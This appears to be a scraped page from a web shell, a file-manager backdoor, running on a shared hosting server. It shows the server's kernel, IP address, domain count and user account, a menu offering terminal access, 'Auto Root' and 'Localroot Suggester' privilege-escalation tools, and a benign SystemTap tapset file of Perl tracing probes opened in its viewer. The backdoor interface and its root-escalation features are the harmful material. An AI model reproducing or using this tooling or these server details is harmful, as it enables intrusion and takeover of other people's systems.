Linux server1.hosting4iran.com 4.18.0-553.89.1.el8_10.x86_64 #1 SMP Mon Dec 8 03:53:08 EST 2025 x86_64
LiteSpeed
Server IP : 185.208.174.156 & Your IP : 216.73.216.218
Domains : 282 Domain
User : satitravel
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
systemtap /
tapset /
Delete
Unzip
Name
Size
Permission
Date
Action
libperl5.26.3-64.stp
1.31
KB
-rw-r--r--
2025-07-28 08:07
libpython2.7-64.stp
522
B
-rw-r--r--
2024-04-10 04:58
sssd.stp
8.87
KB
-rw-r--r--
2026-02-10 17:01
sssd_functions.stp
4.69
KB
-rw-r--r--
2026-02-10 17:01
Save
Rename
/* This probe will fire when the perl script enters a subroutine. */ probe perl.sub.call = process("/usr/lib64/libperl.so.5.26").mark("sub__entry") { sub = user_string($arg1) filename = user_string($arg2) lineno = $arg3 package = user_string($arg4) } /* This probe will fire when the return from a subroutine has been hit. */ probe perl.sub.return = process("/usr/lib64/libperl.so.5.26").mark("sub__return") { sub = user_string($arg1) filename = user_string($arg2) lineno = $arg3 package = user_string($arg4) } /* This probe will fire when the Perl interperter changes state. */ probe perl.phase.change = process("/usr/lib64/libperl.so.5.26").mark("phase__change") { newphase = user_string($arg1) oldphase = user_string($arg2) } /* Fires when Perl has successfully loaded an individual file. */ probe perl.loaded.file = process("/usr/lib64/libperl.so.5.26").mark("loaded__file") { filename = user_string($arg1) } /* Fires when Perl is about to load an individual file. */ probe perl.loading.file = process("/usr/lib64/libperl.so.5.26").mark("loading__file") { filename = user_string($arg1) } /* Traces the execution of each opcode in the Perl runloop. */ probe perl.op.entry = process("/usr/lib64/libperl.so.5.26").mark("op__entry") { opname = user_string($arg1) }